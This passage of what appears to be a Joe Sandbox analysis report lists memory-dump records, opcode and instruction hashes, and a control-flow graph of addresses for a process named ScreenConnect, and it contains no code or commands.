                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 61602f6edb724c46b90135ba076dd6f1b96f9f88e30feed250089add06530703
                                                                      • Instruction ID: ca49f8b5c4c94c32375ed92d3c8dbc1774fecda0d00ca5c63c563b95aa98ef74
                                                                      • Opcode Fuzzy Hash: 61602f6edb724c46b90135ba076dd6f1b96f9f88e30feed250089add06530703
                                                                      • Instruction Fuzzy Hash: D3125772B1EA4E0BE7789A6884756B43FD2EF95300F5A01B9D46DCB1E7DD28BD028341
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a8f9922303b68b4679b138e8d9973ae2900a41408f82d296db8d0d9d1975e48
                                                                      • Instruction ID: db7f8fafcedf46f4ecd2be0e838f348f8b56d4585dfa9a572a9ae66240a6e655
                                                                      • Opcode Fuzzy Hash: 7a8f9922303b68b4679b138e8d9973ae2900a41408f82d296db8d0d9d1975e48
                                                                      • Instruction Fuzzy Hash: F402D271B1DA4E4FEBA8EB6884A5AB97BD1FFA4300F01417DD05EC72A6DE24B841C741

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2989971386.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b3e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: fcbee0422acdb3d2fa4a57a8ff34da5d3c4ed55a5fee52d7146b73f984fee195
                                                                      • Instruction ID: 16a0c5ac2d379e67500e2a6dc6261fe4c645d1d204524631932a4c48010f847e
                                                                      • Opcode Fuzzy Hash: fcbee0422acdb3d2fa4a57a8ff34da5d3c4ed55a5fee52d7146b73f984fee195
                                                                      • Instruction Fuzzy Hash: 4B512831D0DB494FDB29EFA8984A5E97BE0EF55310F04027FE089C3292DA78B9468791

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1
                                                                      • API String ID: 0-736386057
                                                                      • Opcode ID: 18c24aa6cef24528a8092e351517174f1373927f0189ff105fa1598a66ca3e37
                                                                      • Instruction ID: 29076ce093e719e0b3634e953e3a7993ec84976ea130d043523ad14efcea6cb9
                                                                      • Opcode Fuzzy Hash: 18c24aa6cef24528a8092e351517174f1373927f0189ff105fa1598a66ca3e37
                                                                      • Instruction Fuzzy Hash: 2C9149B271DA4D4FDB98DF6888A1AA537D2FFA4350B4401BDE46DCB197DE25F8028B40

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 603 7ffd9b6f6f60-7ffd9b6f6f71 606 7ffd9b6f6f77-7ffd9b6f6f85 call 7ffd9b6f00f0 603->606 607 7ffd9b6f6f73-7ffd9b6f6f75 603->607 608 7ffd9b6f6f88-7ffd9b6f6f91 606->608 607->608 612 7ffd9b6f6f98-7ffd9b6f6f9f 608->612 613 7ffd9b6f6fa5-7ffd9b6f6fac 612->613 614 7ffd9b6f70ee-7ffd9b6f710c call 7ffd9b6f0c30 * 2 612->614 613->614 616 7ffd9b6f6fb2-7ffd9b6f6fc9 613->616 623 7ffd9b6f7136-7ffd9b6f7165 call 7ffd9b6f0c30 * 2 614->623 624 7ffd9b6f710e-7ffd9b6f7118 614->624 621 7ffd9b6f6fcb-7ffd9b6f6fdd 616->621 622 7ffd9b6f6ffe-7ffd9b6f7009 616->622 634 7ffd9b6f6fe3-7ffd9b6f6ff1 call 7ffd9b6f00f0 621->634 635 7ffd9b6f6fdf-7ffd9b6f6fe1 621->635 631 7ffd9b6f700b-7ffd9b6f700d 622->631 632 7ffd9b6f700f-7ffd9b6f701e call 7ffd9b6f00f0 622->632 652 7ffd9b6f716b-7ffd9b6f717a call 7ffd9b6f00f0 623->652 653 7ffd9b6f7167-7ffd9b6f7169 623->653 626 7ffd9b6f712c 624->626 627 7ffd9b6f711a-7ffd9b6f712a 624->627 630 7ffd9b6f712e-7ffd9b6f712f 626->630 627->630 630->623 637 7ffd9b6f7021-7ffd9b6f7023 631->637 632->637 641 7ffd9b6f6ff4-7ffd9b6f6ff7 634->641 635->641 643 7ffd9b6f7029-7ffd9b6f7040 637->643 644 7ffd9b6f70d8-7ffd9b6f70ea 637->644 641->622 643->644 651 7ffd9b6f7046-7ffd9b6f7063 643->651 644->614 663 7ffd9b6f7065-7ffd9b6f706d 651->663 664 7ffd9b6f706f 651->664 654 7ffd9b6f717d-7ffd9b6f71c1 652->654 653->654 661 7ffd9b6f71c3-7ffd9b6f71cb 654->661 662 7ffd9b6f71d4-7ffd9b6f71dc 654->662 665 7ffd9b6f71dd-7ffd9b6f71de 661->665 667 7ffd9b6f71cd-7ffd9b6f71d2 661->667 662->665 666 7ffd9b6f71ee 662->666 668 7ffd9b6f7071-7ffd9b6f7073 663->668 664->668 671 7ffd9b6f71e3-7ffd9b6f71ed call 7ffd9b6f6a80 665->671 672 7ffd9b6f71f4-7ffd9b6f7216 666->672 667->671 668->644 670 7ffd9b6f7075-7ffd9b6f707f 668->670 673 7ffd9b6f7081-7ffd9b6f708b call 7ffd9b6f1760 670->673 674 7ffd9b6f708d-7ffd9b6f7095 670->674 671->672 685 7ffd9b6f721c-7ffd9b6f722b call 7ffd9b6f00f0 672->685 686 7ffd9b6f7218-7ffd9b6f721a 672->686 673->614 673->674 678 7ffd9b6f7097-7ffd9b6f70bc call 7ffd9b6f5358 674->678 679 7ffd9b6f70c3-7ffd9b6f70d6 call 7ffd9b6f5500 674->679 678->679 679->614 689 7ffd9b6f722e-7ffd9b6f7230 685->689 686->689 692 7ffd9b6f7236-7ffd9b6f7257 689->692 693 7ffd9b6f7382-7ffd9b6f738d 689->693
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 90ed5532b428100558c0f22d51a8b3146210e3fabae9211af2d5e6a5d0d00b69
                                                                      • Instruction ID: 78ec6fcc2ee1efab31e5c85791762f2c75b9034edc46d36357a9428001188a3a
                                                                      • Opcode Fuzzy Hash: 90ed5532b428100558c0f22d51a8b3146210e3fabae9211af2d5e6a5d0d00b69
                                                                      • Instruction Fuzzy Hash: BE71AA71F1A90F4BF775EAA480716BD7AD2EF94344F56403DD42ECA1E2DD397A068240

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l
                                                                      • API String ID: 0-2517025534
                                                                      • Opcode ID: 9fded1588d2673bf189a763482ed9a3a176e9db72be38cae0ebe6e7449382248
                                                                      • Instruction ID: 5d54c3c64bc4c5b903075e6210ea3f1a62dda2f6407d75b1d1bb4b7dc4bd2f47
                                                                      • Opcode Fuzzy Hash: 9fded1588d2673bf189a763482ed9a3a176e9db72be38cae0ebe6e7449382248
                                                                      • Instruction Fuzzy Hash: 70213623E1FA8D0FD7159B7848759B97FA0FF81200B0542AAD068DB5E3DD086A098340
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31580f69df7ce9fbeb8f2b9e3f1c7a9dec8a512a83ea1d8314b3aa4d1559ca14
                                                                      • Instruction ID: 6b6a2425d3ba47c6f53a9721635651d228ad72273b442a3156aba8de24da9788
                                                                      • Opcode Fuzzy Hash: 31580f69df7ce9fbeb8f2b9e3f1c7a9dec8a512a83ea1d8314b3aa4d1559ca14
                                                                      • Instruction Fuzzy Hash: 08C16B33B0FA4E0BEB68EA688462CB57BD1EF51350B05027DD46D8B5D7ED15FA0A8381
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5fb70cb090c501efbc3c07c33f396cd65b1f1abab73d4792e338453074afd12
                                                                      • Instruction ID: 16276f554957fd93f4c7cff35ce2d0baebf42e73bffe7bdc161e18ec5415f9a3
                                                                      • Opcode Fuzzy Hash: d5fb70cb090c501efbc3c07c33f396cd65b1f1abab73d4792e338453074afd12
                                                                      • Instruction Fuzzy Hash: B4918B61B1EE8E4FEB69DB6888654A47FE0FF55300B0501FAD06CCB1E7DE18B9058381
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f67737cff08c119a1c2ee5ca060612a26d603905e39c8c4f1c4d9384b6d8878d
                                                                      • Instruction ID: bfc9e73500dabb4c380b73593e801cc078f260c841562354352d3b66ff54d1fa
                                                                      • Opcode Fuzzy Hash: f67737cff08c119a1c2ee5ca060612a26d603905e39c8c4f1c4d9384b6d8878d
                                                                      • Instruction Fuzzy Hash: AC917334709A4A4FDBDCEF58C4A0AA177A2FF9930472545ADC069CF69BCA25F846C780
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 371d7e2bc7dffb30384461a33868c9ecb7a5aa36018d6f93d7d5d122eef0d6e4
                                                                      • Instruction ID: 4a1afb07916138d927efa1d7bf3d035600655ea6322ec9a6c5812b207e8e663e
                                                                      • Opcode Fuzzy Hash: 371d7e2bc7dffb30384461a33868c9ecb7a5aa36018d6f93d7d5d122eef0d6e4
                                                                      • Instruction Fuzzy Hash: 78915A62B1F94F0AFB69ABA844B15F82F92EF51314F0A02B9D4ADCF0E7DD187D058241
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e923136c8adce05243081a773abe5734d8b630dee3d07d098416f477f6b3fff2
                                                                      • Instruction ID: 95dc71d673cd321b0ae59ab82d11df9fbd8c6de1b3bf4dc5941d1fc9b7721e27
                                                                      • Opcode Fuzzy Hash: e923136c8adce05243081a773abe5734d8b630dee3d07d098416f477f6b3fff2
                                                                      • Instruction Fuzzy Hash: 5C71FD70719A0E8FEBB8EF98C4A1BA537D1FF58701F5140B8E46ECB2A6DD65F9018640
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f79aab150acbf4955c0b61aa696c85901e46612da8a043819fee21236f5d1cc7
                                                                      • Instruction ID: fc62cfd6433a2e6420fc6448e47990dce5494150c407f7226f18eff7ede21b4d
                                                                      • Opcode Fuzzy Hash: f79aab150acbf4955c0b61aa696c85901e46612da8a043819fee21236f5d1cc7
                                                                      • Instruction Fuzzy Hash: 4851DA17F0F6DA1BE72267ACA8B64E57F60EF5226470901F7C1E88F0E3DD05758A8251
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df93707991d60dc3e58fb5b919c6e65ef8809162d54252e9ac97bbdb33c429b7
                                                                      • Instruction ID: bfc927d14442091e4cc1ceb423d7003c01ea72ba95085882b9fa833327381c94
                                                                      • Opcode Fuzzy Hash: df93707991d60dc3e58fb5b919c6e65ef8809162d54252e9ac97bbdb33c429b7
                                                                      • Instruction Fuzzy Hash: 33619271719A4E8FDFD4DF58C8A0AA537A1FF68314B1502B9D429CB2A6DB35F842CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ffdc8abb17f7a33bb486ed3d2ce2429ad35dc3f5f73ff08a28f7eafcea85e63
                                                                      • Instruction ID: 0ebfc8dee28191359daf82407c594371708aabe2239ac9e5708554e2b6299495
                                                                      • Opcode Fuzzy Hash: 1ffdc8abb17f7a33bb486ed3d2ce2429ad35dc3f5f73ff08a28f7eafcea85e63
                                                                      • Instruction Fuzzy Hash: 1A310A63B0E98C0FE7E4DA6D689D5603FC1EF9A65170940FBE45DCF2A2E815EC458341
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da9162298d91f8a193a0d2a49f3f6f30dd06ceadf65353a5400dcc00297025f9
                                                                      • Instruction ID: 97d1d6e336f426f5763363efb520aa91d79a7928142120994b752180164b1152
                                                                      • Opcode Fuzzy Hash: da9162298d91f8a193a0d2a49f3f6f30dd06ceadf65353a5400dcc00297025f9
                                                                      • Instruction Fuzzy Hash: 32314F70B09A4E8FCB94EF58C460AA977A2FF99314B5141A9D42DC72D6CB35EC52CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23888be6e3e872f787707c361e54165fdaa9463942a0eb64d4a47b1c81c2f397
                                                                      • Instruction ID: 73acb5cd1db35be06ae84464edda9b054ec32575ade2a252d26fcd28244b0452
                                                                      • Opcode Fuzzy Hash: 23888be6e3e872f787707c361e54165fdaa9463942a0eb64d4a47b1c81c2f397
                                                                      • Instruction Fuzzy Hash: AD31F533F0EE4DCAEB64DA9998B10E97B91FF94304F4901B9D06CC71B2DB2179028745
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e29c45a87b4cc6aac83fd66d09339c1871777579cbd9ccbd44f50d5265ee37a9
                                                                      • Instruction ID: 11af26ee490f2c3e70a5774773e19dce7103b412fe626ec571d7e28fa3da963e
                                                                      • Opcode Fuzzy Hash: e29c45a87b4cc6aac83fd66d09339c1871777579cbd9ccbd44f50d5265ee37a9
                                                                      • Instruction Fuzzy Hash: 2A218C62B1EA4E0FFB95EBAC18A25B47BC1DF5126070501BAD058CB1ABE819FD4283C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ada9f7e28f0debdea500ebe1afa99b90b8369b02b3d867150254c3d39fcee009
                                                                      • Instruction ID: 39559d46523084a80ce54fc78bec25f9d1f91b595239eb71f3ba067f1f0e08ca
                                                                      • Opcode Fuzzy Hash: ada9f7e28f0debdea500ebe1afa99b90b8369b02b3d867150254c3d39fcee009
                                                                      • Instruction Fuzzy Hash: 67314C30B0990E8FCB98EF1CC460AA977A2FF98304B504169D42DC7296CB35ED52CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62f71868d9b101e737c9f753d47e45dc799f7d3b4e3146a77ad495fee4d03978
                                                                      • Instruction ID: b75ce0a1319f0499be564b0709241087da6085705ecd6c966d8c721bcbb6a1c8
                                                                      • Opcode Fuzzy Hash: 62f71868d9b101e737c9f753d47e45dc799f7d3b4e3146a77ad495fee4d03978
                                                                      • Instruction Fuzzy Hash: 3B210632B1EA8D8FD7A59B6598650A57BE1FF85310B0902FAD099C71E2DB28B8028351
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b453a3fd7670dff12214b4dad6e24cb6a5e27bbb758f23a88526f1c94d24c167
                                                                      • Instruction ID: d930615ea34ae2b3cf5eb5901028de9db8872c7eae8178aa8b73a4e0d58f6571
                                                                      • Opcode Fuzzy Hash: b453a3fd7670dff12214b4dad6e24cb6a5e27bbb758f23a88526f1c94d24c167
                                                                      • Instruction Fuzzy Hash: 1021A427A0F2955BD711BB6CE8618D53F60EF4232870902F7D0D99B0B3D915798AC791
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b05c5e078b4fa3658f9767959aa2c0a152ca456e02c7c98c9a70aad8779e5142
                                                                      • Instruction ID: bc9696aa84142edce1104a4d67c0e6e245b6ec66c8651f8bbedbaf6e61586e11
                                                                      • Opcode Fuzzy Hash: b05c5e078b4fa3658f9767959aa2c0a152ca456e02c7c98c9a70aad8779e5142
                                                                      • Instruction Fuzzy Hash: 43112B21B0EA8D0FD7E5966CAC655603FD0EF8726070941FBD45CCF0E3D958AD468341
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6d337c62dbe7159490025f7396715dc5d7b8f301c1e724fd1bba48353c950b23
                                                                      • Instruction ID: eae7513627836f4f408e7fbe51ecb62a700db9867bccd10e3961bce342a928a9
                                                                      • Opcode Fuzzy Hash: 6d337c62dbe7159490025f7396715dc5d7b8f301c1e724fd1bba48353c950b23
                                                                      • Instruction Fuzzy Hash: 16110833B1ED4D8AEFA486A81D712FD3A81EF85304F0900FAE43DC71B2DE1579018285
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e7f7e79fa9b059640881e4e9a223eb3ea9e4dbb72d65a701172c481c074214b
                                                                      • Instruction ID: 7e1fb619195f1746d1215398e776231349fd21b16247dc669d4c4ad4b7920567
                                                                      • Opcode Fuzzy Hash: 0e7f7e79fa9b059640881e4e9a223eb3ea9e4dbb72d65a701172c481c074214b
                                                                      • Instruction Fuzzy Hash: D4117572F1EA4C4BDF91DBA45CB51A97FA1EF55304F4600AAD068D71B2DA256901C701
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ae9ef1814177b17eabcf24ee06886041932c6bc2f4e99463489150096853066
                                                                      • Instruction ID: 06e5bcefd9fba6227ab719aac75ec9547f8350f7426f4275221191db2cb091b4
                                                                      • Opcode Fuzzy Hash: 3ae9ef1814177b17eabcf24ee06886041932c6bc2f4e99463489150096853066
                                                                      • Instruction Fuzzy Hash: 44119071B19A094FDBD8EFA8C060B657B92FF64300B4541A8D45DCF2A7DE25F945CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c761d8c34f204f28d01fb00ec503826eaae2aac64aba7dff9b8c61cfa40c0b3
                                                                      • Instruction ID: f955d79cb15f0bfb391e72ae5fc01a35b3afe9ff51ca9369dc1ef2437f9cffdb
                                                                      • Opcode Fuzzy Hash: 1c761d8c34f204f28d01fb00ec503826eaae2aac64aba7dff9b8c61cfa40c0b3
                                                                      • Instruction Fuzzy Hash: 61016151B1AD0E0AEBA4FB7D04E567645C2DFD424075141B5D01CCB1DFDC28FD414380
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce84e8a9eeac4029f4aee5deebc90c63091d983766d4b106435800a1c625e4cf
                                                                      • Instruction ID: 2d7e0a0aac20faf1948cda03b982b3436a40c240a395f52de63cd7ca44cdb686
                                                                      • Opcode Fuzzy Hash: ce84e8a9eeac4029f4aee5deebc90c63091d983766d4b106435800a1c625e4cf
                                                                      • Instruction Fuzzy Hash: E8113612F0EB4B0BFBB892AA84B03752BE1DF41340F1A40BEC46DCA4E2DD1CAD818301
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00874dcd8fd52c24a6e80d45e35125b3c631c0e4c5b03ced4c8c20ed3213f759
                                                                      • Instruction ID: 23704dd2a1e3706eec7b7b13cc9dfaa64509a269b802e4c8ff561f976d82dbbd
                                                                      • Opcode Fuzzy Hash: 00874dcd8fd52c24a6e80d45e35125b3c631c0e4c5b03ced4c8c20ed3213f759
                                                                      • Instruction Fuzzy Hash: 6F119D71B19A494FDBD8EFA8C060B627B92FF68300B4441A8D45DCF2A7DA25F9458B40
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15a4eaa2a17c1074a7279d84ed442934912eeac3f94be252e09176463d13c1de
                                                                      • Instruction ID: 89287ada4ddeb984668a4ee94fb042284298abb4cf0e2044bbf6349884db4ee3
                                                                      • Opcode Fuzzy Hash: 15a4eaa2a17c1074a7279d84ed442934912eeac3f94be252e09176463d13c1de
                                                                      • Instruction Fuzzy Hash: D501C22170EBCC0FD3D6DA6DACA95A13FE1EF5B26530901EBE588CB2A3E8519C458351
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 662df19019ad638bf9675c2c030288c32abb389f7db76c1b74fa4ceed57e1c6f
                                                                      • Instruction ID: 103123a2ae21b2aa537ac10bb6db8b53ca7539c3fd3a70a2a3496de45803bdc1
                                                                      • Opcode Fuzzy Hash: 662df19019ad638bf9675c2c030288c32abb389f7db76c1b74fa4ceed57e1c6f
                                                                      • Instruction Fuzzy Hash: 07F0AF2150F2D60FD3629BB08865AA07FF0AF47150B0E82FAD098CF4A3D90C6D8A8761
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
